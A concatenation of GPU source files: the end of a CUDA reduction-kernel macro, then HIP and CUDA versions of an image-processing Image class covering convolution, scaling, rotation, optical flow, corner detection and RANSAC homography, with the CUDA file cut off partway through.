gridDim.y + blockIdx.y] = sum;\ }\ }\ \ /* Each column gets 1 block of threads. TODO currently blocksize must be 1 warp*/\ extern "C" \ __global__ void MAKE_NAME(reduce_col, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /*__shared__ T buffer[32];\*/\ \ for(int col = threadIdx.y + blockIdx.x * blockDim.y; col < cols; col += blockDim.y * gridDim.x) {\ T sum = identity;\ for(int row = threadIdx.x; row < rows; row += blockDim.x) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ \ __syncthreads();\ for (int i = 1; i < blockDim.x; i *= 2) {\ T x = shfl_down(sum, i);\ sum = fun(sum, x);\ }\ \ if(laneId == 0) {\ out[col] = sum;\ }\ }\ }\ \ \ /*Each row has its own thread. We should make multiple threads per row, but later. TODO */\ extern "C" \ __global__ void MAKE_NAME(reduce_row, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /* __shared__ T buffer[32];*/\ \ int numReducers = blockDim.x * gridDim.x;\ for(int row = threadIdx.x + blockIdx.x * blockDim.x; row < rows; row += numReducers) {\ T sum = identity;\ for(int col = 0; col < cols; col++) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ \ out[row] = sum;\ }\ }\ #include "function_decls.cuh"
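// A hedged illustration (function_decls.cuh itself is not shown in this dump): instantiating
// MAP_FUN_1 for a unary device function generates an extern "C" kernel named map_<fun>_<T>.
// The gpu_expf macro, the mapExpf wrapper, and the launch geometry below are assumptions made
// only for this example.
#define gpu_expf(x) expf(x)
MAP_FUN_1(gpu_expf, float)   // defines: extern "C" __global__ void map_gpu_expf_float(int rows, int cols, ...)

// Apply expf elementwise to a column-major rows x cols matrix already resident on the device.
void mapExpf(float* d_out, const float* d_in, int rows, int cols) {
    dim3 threads(16, 16);   // threadIdx.x walks columns, threadIdx.y walks rows (see MAP_FUN_1)
    dim3 blocks((cols + threads.x - 1) / threads.x,
                (rows + threads.y - 1) / threads.y);
    map_gpu_expf_float<<<blocks, threads>>>(rows, cols, d_out, rows, d_in, rows);
}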
feffac992fac7bfedbdeaa2b7d2fbfa02a9568be.hip
// !!! This is a file automatically generated by hipify!!! #include "../include/common.h" #include "../include/functions.cuh" #include "../include/image.cuh" #include "../include/kernel.h" #include "../libs/stb/stb_image.h" #include "../libs/stb/stb_image_write.h" #include <bits/stdc++.h> #include <hip/hip_runtime.h> #include <thrust/device_vector.h> #include <thrust/host_vector.h> #include <thrust/sort.h> #include <stdexcept> Image::Image(const char *filename, bool grayscale) { _filename = filename; int desiredChannels = 3; if (grayscale) { desiredChannels = 1; } int w, h, c; unsigned char *data = stbi_load(_filename, &w, &h, &c, desiredChannels); if (!data) { return; } _width = w; _height = h; _channels = desiredChannels; _nBytes = w * h * desiredChannels * sizeof(unsigned char); // Allocate space for the host copy. _h_data = (unsigned char *)malloc(_nBytes); for (int i = 0; i < w * h * desiredChannels; i++) { _h_data[i] = data[i]; } // Allocate space for the cuda copy. hipMalloc((unsigned char **)&_d_data, _nBytes); stbi_image_free(data); } Image::Image(const Image &obj) { _device = obj._device; _filename = obj._filename; _width = obj._width; _height = obj._height; _channels = obj._channels; _nBytes = _width * _height * _channels * sizeof(unsigned char); // Allocate space for the host copy. _h_data = (unsigned char *)malloc(_nBytes); for (int i = 0; i < _width * _height * _channels; i++) { _h_data[i] = obj._h_data[i]; } // Allocate space for the cuda copy. hipMalloc((unsigned char **)&_d_data, _nBytes); hipMemcpy(_d_data, obj._d_data, _nBytes, hipMemcpyDeviceToDevice); } Image::~Image(void) { free(_h_data); hipFree(_d_data); } Image Image::operator-(const Image &obj) { // Return if images have different sizes. if (_width != obj._width or _height != obj._height or _channels != obj._channels) { throw std::invalid_argument("images have different sizes"); } Image result(obj); result.setDevice(_device); if (strcmp(_device, _validDevices[0]) == 0) { differenceOnHost(result.getData(), getData(), getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getSize() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( differenceOnDevice), dim3(blocks), dim3(threads), 0, 0, result.getData(), getData(), getWidth(), getHeight(), getChannels()); } return result; } int Image::getChannels() { return _channels; } unsigned char *Image::getData() { if (strcmp(_device, _validDevices[0]) == 0) { return _h_data; } else { return _d_data; } } const char *Image::getDevice() { return _device; } unsigned int *Image::getElement(int index) { unsigned int *values = new unsigned int[_channels]; if (index >= _width * _height) { return NULL; } // Synchronize matrices if needed. // TODO optimise synchronization to avoid to check everytime when on cuda. 
if (strcmp(_device, _validDevices[1]) == 0 and isSynchronized() == 0) { hipMemcpy(_h_data, _d_data, _nBytes, hipMemcpyDeviceToHost); } for (int c = 0; c < _channels; c++) { values[c] = _h_data[index * _channels + c]; } return values; } unsigned int *Image::getElement(int row, int col) { if (row >= _height or col >= _width) { return NULL; } return getElement(row * _width + col); } const char *Image::getFilename() { return _filename; } int Image::getHeight() { return _height; } int Image::getSize() { return _width * _height * _channels; } int Image::getWidth() { return _width; } bool Image::isSynchronized() { unsigned char *h_d_data_copy = (unsigned char *)malloc(_nBytes); hipMemcpy(h_d_data_copy, _d_data, _nBytes, hipMemcpyDeviceToHost); float epsilon = 1.0E-8; int match = 1; for (int i = 0; i < getSize(); i++) { if (abs(_h_data[i] - h_d_data_copy[i]) > epsilon) { match = 0; break; } } free(h_d_data_copy); return match; } void Image::save(const char *filename) { // Synchronize matrices if needed. if (strcmp(_device, _validDevices[1]) == 0 and isSynchronized() == 0) { hipMemcpy(_h_data, _d_data, _nBytes, hipMemcpyDeviceToHost); } stbi_write_png(filename, _width, _height, _channels, _h_data, _width * _channels); } void Image::setDevice(const char *device) { if (arrayContains(_validDevices, device) == 0) { return; } if (strcmp(device, _device) != 0) { _device = device; if (strcmp(device, _validDevices[0]) == 0) { hipMemcpy(_h_data, _d_data, _nBytes, hipMemcpyDeviceToHost); } else { hipMemcpy(_d_data, _h_data, _nBytes, hipMemcpyHostToDevice); } } } void Image::calcOpticalFlow(int *currentCorners, Image *previousFrame, int *corners, int maxCorners, int levels) { Image *gray = new Image(getFilename(), true); Image *prevGray = new Image(previousFrame->getFilename(), true); gray->setDevice(getDevice()); prevGray->setDevice(getDevice()); if (strcmp(_device, _validDevices[0]) == 0) { unsigned char *currPyramidalScales[levels]; unsigned char *prevPyramidalScales[levels]; // Create the pyramidal scales. for (int l = 0; l < levels; l++) { int levelWidth = gray->getWidth() / pow(2, l); int levelHeight = gray->getHeight() / pow(2, l); currPyramidalScales[l] = new unsigned char[gray->getSize()]; prevPyramidalScales[l] = new unsigned char[prevGray->getSize()]; if (l == 0) { for (int i = 0; i < gray->getSize(); i++) { currPyramidalScales[l][i] = gray->getData()[i]; prevPyramidalScales[l][i] = prevGray->getData()[i]; } } else { scaleOnHost(currPyramidalScales[l], currPyramidalScales[l - 1], 0.5, levelWidth * 2, levelHeight * 2, 1); scaleOnHost(prevPyramidalScales[l], prevPyramidalScales[l - 1], 0.5, levelWidth * 2, levelHeight * 2, 1); } } opticalFLowOnHost(currentCorners, corners, maxCorners, currPyramidalScales, prevPyramidalScales, levels, gray->getWidth(), gray->getHeight()); // Free memory. for (int l = 0; l < levels; l++) { delete[] currPyramidalScales[l]; delete[] prevPyramidalScales[l]; } } else { // Copy corner arrays to device. size_t cornersBytes = maxCorners * sizeof(int); int *d_corners, *d_currCorners; hipMalloc((int **)&d_corners, cornersBytes); hipMalloc((int **)&d_currCorners, cornersBytes); hipMemcpy(d_corners, corners, cornersBytes, hipMemcpyHostToDevice); // Create the pyramidal scales. 
size_t pyramidBytes = gray->getSize() * sizeof(unsigned char); unsigned char *currPyramidalScales, *prevPyramidalScales; hipMalloc((unsigned char **)&currPyramidalScales, levels * pyramidBytes); hipMalloc((unsigned char **)&prevPyramidalScales, levels * pyramidBytes); int copyBlockSize = 1024; dim3 copyThreads(copyBlockSize, 1); dim3 copyBlocks( (gray->getWidth() * gray->getHeight() + copyThreads.x - 1) / copyThreads.x, 1); for (int l = 0; l < levels; l++) { int levelWidth = gray->getWidth() / pow(2, l); int levelHeight = gray->getHeight() / pow(2, l); if (l == 0) { hipMemcpy(currPyramidalScales, gray->getData(), pyramidBytes, hipMemcpyDeviceToDevice); hipMemcpy(prevPyramidalScales, prevGray->getData(), pyramidBytes, hipMemcpyDeviceToDevice); } else { hipLaunchKernelGGL(( scaleOnDevice), dim3(copyBlocks), dim3(copyThreads), 0, 0, currPyramidalScales + l * gray->getSize(), currPyramidalScales + (l - 1) * gray->getSize(), 0.5, levelWidth * 2, levelHeight * 2, 1); hipLaunchKernelGGL(( scaleOnDevice), dim3(copyBlocks), dim3(copyThreads), 0, 0, prevPyramidalScales + l * gray->getSize(), prevPyramidalScales + (l - 1) * gray->getSize(), 0.5, levelWidth * 2, levelHeight * 2, 1); } } // Determine grid size for parallel operations. int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((maxCorners + copyThreads.x - 1) / copyThreads.x, 1); // Initialise all work on the device asynchronously in depth-first // order. hipLaunchKernelGGL(( opticalFLowOnDevice), dim3(blocks), dim3(threads), 0, 0, d_currCorners, d_corners, maxCorners, currPyramidalScales, prevPyramidalScales, levels, gray->getSize(), gray->getWidth(), gray->getHeight()); hipMemcpy(currentCorners, d_currCorners, cornersBytes, hipMemcpyDeviceToHost); // Free memory. hipFree(d_corners); hipFree(d_currCorners); hipFree(currPyramidalScales); hipFree(prevPyramidalScales); } // Free memory. delete gray; delete prevGray; } void Image::convolution(float *kernel, int kernelSide) { unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } convolutionOnHost(getData(), dataCopy, kernel, kernelSide, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Create a copy of the data on device. hipMalloc((unsigned char **)&dataCopy, _nBytes); hipMemcpy(dataCopy, getData(), _nBytes, hipMemcpyDeviceToDevice); // Copy kernel to device. float *d_kernel; hipMalloc((float **)&d_kernel, kernelSide * kernelSide * sizeof(float)); hipMemcpy(d_kernel, kernel, kernelSide * kernelSide * sizeof(float), hipMemcpyHostToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( convolutionOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), dataCopy, d_kernel, kernelSide, getWidth(), getHeight(), getChannels()); // Free memory. 
hipFree(d_kernel); hipFree(dataCopy); } } void Image::drawLine(int index1, int index2, int radius, int *color, int colorSize) { if (index1 < 0 or index2 < 0) { return; } int x1 = (int)(index1 / getWidth()); int y1 = (index1 % getWidth()); int x2 = (int)(index2 / getWidth()); int y2 = (index2 % getWidth()); this->drawLine(x1, y1, x2, y2, radius, color, colorSize); } void Image::drawLine(int x1, int y1, int x2, int y2, int radius, int *color, int colorSize) { if (strcmp(_device, _validDevices[0]) == 0) { drawLineOnHost(getData(), x1, y1, x2, y2, radius, color, colorSize, getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); size_t colorBytes = colorSize * sizeof(int); int *d_color; hipMalloc((int **)&d_color, colorBytes); hipMemcpy(d_color, color, colorBytes, hipMemcpyHostToDevice); hipLaunchKernelGGL(( drawLineOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), x1, y1, x2, y2, radius, d_color, colorSize, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(d_color); } } void Image::drawPoint(int index, int radius, int *color, int colorSize) { if (index < 0) { return; } int x = (int)(index / getWidth()); int y = (index % getWidth()); this->drawPoint(x, y, radius, color, colorSize); } void Image::drawPoint(int x, int y, int radius, int *color, int colorSize) { if (strcmp(_device, _validDevices[0]) == 0) { drawPointOnHost(getData(), x, y, radius, color, colorSize, getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); size_t colorBytes = colorSize * sizeof(int); int *d_color; hipMalloc((int **)&d_color, colorBytes); hipMemcpy(d_color, color, colorBytes, hipMemcpyHostToDevice); hipLaunchKernelGGL(( drawPointOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), x, y, radius, d_color, colorSize, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(d_color); } } void Image::findHomography(float *A, int *currentCorners, int *previousCorners, int maxCorners) { const int maxIter = 2000; const int N_POINTS = 3; const int SPACE_DIM = 2; int size = N_POINTS * (SPACE_DIM + 1) * maxIter; float *matrices = new float[size]; float *scores = new float[maxIter]; // Estimate maxIter different rigid transformations. // The algorithm estimates a matrix using a triplet of points. if (strcmp(_device, _validDevices[0]) == 0) { findHomographyRANSACOnHost(matrices, scores, maxIter, currentCorners, previousCorners, maxCorners, getWidth(), getHeight()); } else { // Instantiate matrices on device. size_t matricesBytes = size * sizeof(float); size_t scoresBytes = maxIter * sizeof(float); float *d_matrices, *d_scores; hipMalloc((float **)&d_matrices, matricesBytes); hipMalloc((float **)&d_scores, scoresBytes); // Copy corners on device. // Copy corner arrays to device. size_t cornersBytes = maxCorners * sizeof(int); int *d_currCorners, *d_prevCorners; hipMalloc((int **)&d_currCorners, cornersBytes); hipMalloc((int **)&d_prevCorners, cornersBytes); hipMemcpy(d_currCorners, currentCorners, cornersBytes, hipMemcpyHostToDevice); hipMemcpy(d_prevCorners, previousCorners, cornersBytes, hipMemcpyHostToDevice); // Generate a random list of indices. 
std::random_device rd; std::mt19937 gen(rd()); std::uniform_int_distribution<> uniform(0, maxCorners); int *randomIndices = new int[N_POINTS * maxIter]; for (int i = 0; i < N_POINTS * maxIter; i++) { randomIndices[i] = uniform(gen); } // Copy random indices to device. size_t randomIndicesBytes = N_POINTS * maxIter * sizeof(int); int *d_randomIndices; hipMalloc((int **)&d_randomIndices, randomIndicesBytes); hipMemcpy(d_randomIndices, randomIndices, randomIndicesBytes, hipMemcpyHostToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((maxIter + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( findHomographyRANSACOnDevice), dim3(blocks), dim3(threads), 0, 0, d_matrices, d_scores, maxIter, d_currCorners, d_prevCorners, maxCorners, d_randomIndices, getWidth(), getHeight()); // Copy result to host. hipMemcpy(matrices, d_matrices, matricesBytes, hipMemcpyDeviceToHost); hipMemcpy(scores, d_scores, scoresBytes, hipMemcpyDeviceToHost); hipFree(d_matrices); hipFree(d_scores); hipFree(d_currCorners); hipFree(d_prevCorners); delete[] randomIndices; hipFree(d_randomIndices); } // Retrieve the best matrix. int bestMatrix = -1; float minError = INFINITY; for (int i = 0; i < maxIter; i++) { if (scores[i] < minError) { int offset = i * (N_POINTS * (SPACE_DIM + 1)); // Avoid nan transformations. if (matrices[offset] == matrices[offset]) { bestMatrix = i; minError = scores[i]; } } } // Copy the best matrix element-wise. int offset = bestMatrix * (N_POINTS * (SPACE_DIM + 1)); for (int i = 0; i < N_POINTS * (SPACE_DIM + 1); i++) { if (minError < INFINITY) { A[i] = matrices[offset + i]; } else { // If the minError is INFINITY, then set the transformation to // the identity matrix to avoid any type of transformation. int side = sqrt(N_POINTS * (SPACE_DIM + 1)); A[i] = int(i % side == (int)i / side); } } delete[] matrices; delete[] scores; } void Image::goodFeaturesToTrack(int *corners, int maxCorners, float qualityLevel, float minDistance) { Image *gradX = new Image(getFilename(), true); Image *gradY = new Image(getFilename(), true); gradX->setDevice(getDevice()); gradY->setDevice(getDevice()); int side; float *sobelX, *sobelY; Kernel::SobelX(&sobelX, &side); Kernel::SobelY(&sobelY); gradX->convolution(sobelX, side); gradY->convolution(sobelY, side); int scoreSize = getWidth() * getHeight(); float *scoreMatrix = new float[scoreSize]; int *keys = new int[scoreSize]; float *values = new float[scoreSize]; if (strcmp(_device, _validDevices[0]) == 0) { cornerScoreOnHost(gradX->getData(), gradY->getData(), scoreMatrix, getWidth(), getHeight()); // Sort values. thrust::host_vector<int> h_keys(scoreSize, 0); thrust::sequence(h_keys.begin(), h_keys.end()); thrust::stable_sort_by_key(scoreMatrix, scoreMatrix + scoreSize, h_keys.begin(), thrust::greater<float>()); thrust::copy(h_keys.begin(), h_keys.end(), keys); thrust::copy(scoreMatrix, scoreMatrix + scoreSize, values); } else { // Copy corner array to device. size_t scoreMatrixBytes = scoreSize * sizeof(float); float *d_scoreMatrix; hipMalloc((float **)&d_scoreMatrix, scoreMatrixBytes); // Determine grid size for parallel operations. int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((scoreSize + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( cornerScoreOnDevice), dim3(blocks), dim3(threads), 0, 0, gradX->getData(), gradY->getData(), d_scoreMatrix, getWidth(), getHeight()); // Sort values. 
thrust::device_ptr<float> d_values(d_scoreMatrix); thrust::device_vector<int> d_keys(scoreSize, 0); thrust::sequence(d_keys.begin(), d_keys.end()); thrust::stable_sort_by_key(d_values, d_values + scoreSize, d_keys.begin(), thrust::greater<float>()); thrust::copy(d_keys.begin(), d_keys.end(), keys); thrust::copy(d_values, d_values + scoreSize, values); } float threshold = values[0] * qualityLevel; int top = 0; for (int i = 0; i < maxCorners; ++i) { corners[i] = -1; float kValue; int kIndex; bool isDistant; do { kValue = values[top]; kIndex = keys[top]; isDistant = true; // Evaluate the Euclidean distance to the previous corners. int j = 0; while (j < i and isDistant) { int otherIndex = corners[j]; int dx = ((int)otherIndex / getWidth()) - ((int)kIndex / getWidth()); int dy = (otherIndex % getWidth()) - (kIndex % getWidth()); int dist = sqrt(pow(dx, 2) + pow(dy, 2)); isDistant = dist > minDistance; j++; } if (isDistant) { // Add only if score is high enough. if (kValue >= threshold) { corners[i] = kIndex; } } top++; } while (not isDistant); } // Free memory. delete gradX; delete gradY; delete[] sobelX; delete[] sobelY; delete[] scoreMatrix; delete[] keys; delete[] values; } void Image::rotate(double degree) { double rad = degree * (M_PI / 180); unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } rotateOnHost(getData(), dataCopy, rad, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Copy histogram to device. hipMalloc((unsigned char **)&dataCopy, _nBytes); hipMemcpy(dataCopy, _d_data, _nBytes, hipMemcpyDeviceToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( rotateOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), dataCopy, rad, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(dataCopy); } } void Image::scale(float ratio) { // Return if ratio is invalid. if (ratio == 1.0 or ratio < 0.0) { return; } unsigned char *newData; int newWidth = int(getWidth() * ratio); int newHeight = int(getHeight() * ratio); int newBytes = newWidth * newHeight * getChannels() * sizeof(unsigned char); if (strcmp(_device, _validDevices[0]) == 0) { newData = (unsigned char *)malloc(newBytes); scaleOnHost(newData, getData(), ratio, getWidth(), getHeight(), getChannels()); // Update data both on device and on host. free(_h_data); _h_data = newData; hipFree(_d_data); hipMalloc((unsigned char **)&_d_data, newBytes); hipMemcpy(_d_data, _h_data, newBytes, hipMemcpyHostToDevice); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((newWidth * newHeight + threads.x - 1) / threads.x, 1); hipMalloc((unsigned char **)&newData, newBytes); hipLaunchKernelGGL(( scaleOnDevice), dim3(blocks), dim3(threads), 0, 0, newData, getData(), ratio, getWidth(), getHeight(), getChannels()); // Update data both on device and on host. hipFree(_d_data); hipMalloc((unsigned char **)&_d_data, newBytes); hipMemcpy(_d_data, newData, newBytes, hipMemcpyDeviceToDevice); free(_h_data); _h_data = (unsigned char *)malloc(newBytes); hipMemcpy(_h_data, _d_data, newBytes, hipMemcpyDeviceToHost); // Free memory. hipFree(newData); } // Update other attributes. 
_width = newWidth; _height = newHeight; _nBytes = newBytes; } void Image::translate(int px, int py) { unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } translateOnHost(getData(), dataCopy, px, py, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Copy histogram to device. hipMalloc((unsigned char **)&dataCopy, _nBytes); hipMemcpy(dataCopy, _d_data, _nBytes, hipMemcpyDeviceToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( translateOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), dataCopy, px, py, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(dataCopy); } } void Image::transpose() { // Return if width and height are different. if (getWidth() != getHeight()) { throw std::invalid_argument("width and height must have the same size"); } if (strcmp(_device, _validDevices[0]) == 0) { transposeOnHost(getData(), getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( transposeOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), getWidth(), getHeight(), getChannels()); } }
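// A hedged usage sketch (not part of the original sources): a minimal driver showing how the Image
// class above might be driven end to end. The input/output file names are placeholders, and the
// device label "gpu" is an assumption -- the real labels come from _validDevices in common.h,
// which is not included in this dump.
#include "../include/image.cuh"
#include "../include/kernel.h"

int main() {
    Image frame("frame_0001.png", /* grayscale = */ true);   // placeholder input image
    frame.setDevice("gpu");                                   // assumed GPU device label

    // Run the Sobel-X convolution used internally by goodFeaturesToTrack().
    int side;
    float* sobelX;
    Kernel::SobelX(&sobelX, &side);
    frame.convolution(sobelX, side);

    frame.save("frame_0001_sobelx.png");                      // placeholder output name

    delete[] sobelX;
    return 0;
}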
feffac992fac7bfedbdeaa2b7d2fbfa02a9568be.cu
#include "../include/common.h" #include "../include/functions.cuh" #include "../include/image.cuh" #include "../include/kernel.h" #include "../libs/stb/stb_image.h" #include "../libs/stb/stb_image_write.h" #include <bits/stdc++.h> #include <cuda_runtime.h> #include <thrust/device_vector.h> #include <thrust/host_vector.h> #include <thrust/sort.h> #include <stdexcept> Image::Image(const char *filename, bool grayscale) { _filename = filename; int desiredChannels = 3; if (grayscale) { desiredChannels = 1; } int w, h, c; unsigned char *data = stbi_load(_filename, &w, &h, &c, desiredChannels); if (!data) { return; } _width = w; _height = h; _channels = desiredChannels; _nBytes = w * h * desiredChannels * sizeof(unsigned char); // Allocate space for the host copy. _h_data = (unsigned char *)malloc(_nBytes); for (int i = 0; i < w * h * desiredChannels; i++) { _h_data[i] = data[i]; } // Allocate space for the cuda copy. cudaMalloc((unsigned char **)&_d_data, _nBytes); stbi_image_free(data); } Image::Image(const Image &obj) { _device = obj._device; _filename = obj._filename; _width = obj._width; _height = obj._height; _channels = obj._channels; _nBytes = _width * _height * _channels * sizeof(unsigned char); // Allocate space for the host copy. _h_data = (unsigned char *)malloc(_nBytes); for (int i = 0; i < _width * _height * _channels; i++) { _h_data[i] = obj._h_data[i]; } // Allocate space for the cuda copy. cudaMalloc((unsigned char **)&_d_data, _nBytes); cudaMemcpy(_d_data, obj._d_data, _nBytes, cudaMemcpyDeviceToDevice); } Image::~Image(void) { free(_h_data); cudaFree(_d_data); } Image Image::operator-(const Image &obj) { // Return if images have different sizes. if (_width != obj._width or _height != obj._height or _channels != obj._channels) { throw std::invalid_argument("images have different sizes"); } Image result(obj); result.setDevice(_device); if (strcmp(_device, _validDevices[0]) == 0) { differenceOnHost(result.getData(), getData(), getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getSize() + threads.x - 1) / threads.x, 1); differenceOnDevice<<<blocks, threads>>>(result.getData(), getData(), getWidth(), getHeight(), getChannels()); } return result; } int Image::getChannels() { return _channels; } unsigned char *Image::getData() { if (strcmp(_device, _validDevices[0]) == 0) { return _h_data; } else { return _d_data; } } const char *Image::getDevice() { return _device; } unsigned int *Image::getElement(int index) { unsigned int *values = new unsigned int[_channels]; if (index >= _width * _height) { return NULL; } // Synchronize matrices if needed. // TODO optimise synchronization to avoid to check everytime when on cuda. 
if (strcmp(_device, _validDevices[1]) == 0 and isSynchronized() == 0) { cudaMemcpy(_h_data, _d_data, _nBytes, cudaMemcpyDeviceToHost); } for (int c = 0; c < _channels; c++) { values[c] = _h_data[index * _channels + c]; } return values; } unsigned int *Image::getElement(int row, int col) { if (row >= _height or col >= _width) { return NULL; } return getElement(row * _width + col); } const char *Image::getFilename() { return _filename; } int Image::getHeight() { return _height; } int Image::getSize() { return _width * _height * _channels; } int Image::getWidth() { return _width; } bool Image::isSynchronized() { unsigned char *h_d_data_copy = (unsigned char *)malloc(_nBytes); cudaMemcpy(h_d_data_copy, _d_data, _nBytes, cudaMemcpyDeviceToHost); float epsilon = 1.0E-8; int match = 1; for (int i = 0; i < getSize(); i++) { if (abs(_h_data[i] - h_d_data_copy[i]) > epsilon) { match = 0; break; } } free(h_d_data_copy); return match; } void Image::save(const char *filename) { // Synchronize matrices if needed. if (strcmp(_device, _validDevices[1]) == 0 and isSynchronized() == 0) { cudaMemcpy(_h_data, _d_data, _nBytes, cudaMemcpyDeviceToHost); } stbi_write_png(filename, _width, _height, _channels, _h_data, _width * _channels); } void Image::setDevice(const char *device) { if (arrayContains(_validDevices, device) == 0) { return; } if (strcmp(device, _device) != 0) { _device = device; if (strcmp(device, _validDevices[0]) == 0) { cudaMemcpy(_h_data, _d_data, _nBytes, cudaMemcpyDeviceToHost); } else { cudaMemcpy(_d_data, _h_data, _nBytes, cudaMemcpyHostToDevice); } } } void Image::calcOpticalFlow(int *currentCorners, Image *previousFrame, int *corners, int maxCorners, int levels) { Image *gray = new Image(getFilename(), true); Image *prevGray = new Image(previousFrame->getFilename(), true); gray->setDevice(getDevice()); prevGray->setDevice(getDevice()); if (strcmp(_device, _validDevices[0]) == 0) { unsigned char *currPyramidalScales[levels]; unsigned char *prevPyramidalScales[levels]; // Create the pyramidal scales. for (int l = 0; l < levels; l++) { int levelWidth = gray->getWidth() / pow(2, l); int levelHeight = gray->getHeight() / pow(2, l); currPyramidalScales[l] = new unsigned char[gray->getSize()]; prevPyramidalScales[l] = new unsigned char[prevGray->getSize()]; if (l == 0) { for (int i = 0; i < gray->getSize(); i++) { currPyramidalScales[l][i] = gray->getData()[i]; prevPyramidalScales[l][i] = prevGray->getData()[i]; } } else { scaleOnHost(currPyramidalScales[l], currPyramidalScales[l - 1], 0.5, levelWidth * 2, levelHeight * 2, 1); scaleOnHost(prevPyramidalScales[l], prevPyramidalScales[l - 1], 0.5, levelWidth * 2, levelHeight * 2, 1); } } opticalFLowOnHost(currentCorners, corners, maxCorners, currPyramidalScales, prevPyramidalScales, levels, gray->getWidth(), gray->getHeight()); // Free memory. for (int l = 0; l < levels; l++) { delete[] currPyramidalScales[l]; delete[] prevPyramidalScales[l]; } } else { // Copy corner arrays to device. size_t cornersBytes = maxCorners * sizeof(int); int *d_corners, *d_currCorners; cudaMalloc((int **)&d_corners, cornersBytes); cudaMalloc((int **)&d_currCorners, cornersBytes); cudaMemcpy(d_corners, corners, cornersBytes, cudaMemcpyHostToDevice); // Create the pyramidal scales. 
size_t pyramidBytes = gray->getSize() * sizeof(unsigned char); unsigned char *currPyramidalScales, *prevPyramidalScales; cudaMalloc((unsigned char **)&currPyramidalScales, levels * pyramidBytes); cudaMalloc((unsigned char **)&prevPyramidalScales, levels * pyramidBytes); int copyBlockSize = 1024; dim3 copyThreads(copyBlockSize, 1); dim3 copyBlocks( (gray->getWidth() * gray->getHeight() + copyThreads.x - 1) / copyThreads.x, 1); for (int l = 0; l < levels; l++) { int levelWidth = gray->getWidth() / pow(2, l); int levelHeight = gray->getHeight() / pow(2, l); if (l == 0) { cudaMemcpy(currPyramidalScales, gray->getData(), pyramidBytes, cudaMemcpyDeviceToDevice); cudaMemcpy(prevPyramidalScales, prevGray->getData(), pyramidBytes, cudaMemcpyDeviceToDevice); } else { scaleOnDevice<<<copyBlocks, copyThreads>>>( currPyramidalScales + l * gray->getSize(), currPyramidalScales + (l - 1) * gray->getSize(), 0.5, levelWidth * 2, levelHeight * 2, 1); scaleOnDevice<<<copyBlocks, copyThreads>>>( prevPyramidalScales + l * gray->getSize(), prevPyramidalScales + (l - 1) * gray->getSize(), 0.5, levelWidth * 2, levelHeight * 2, 1); } } // Determine grid size for parallel operations. int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((maxCorners + copyThreads.x - 1) / copyThreads.x, 1); // Initialise all work on the device asynchronously in depth-first // order. opticalFLowOnDevice<<<blocks, threads>>>( d_currCorners, d_corners, maxCorners, currPyramidalScales, prevPyramidalScales, levels, gray->getSize(), gray->getWidth(), gray->getHeight()); cudaMemcpy(currentCorners, d_currCorners, cornersBytes, cudaMemcpyDeviceToHost); // Free memory. cudaFree(d_corners); cudaFree(d_currCorners); cudaFree(currPyramidalScales); cudaFree(prevPyramidalScales); } // Free memory. delete gray; delete prevGray; } void Image::convolution(float *kernel, int kernelSide) { unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } convolutionOnHost(getData(), dataCopy, kernel, kernelSide, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } 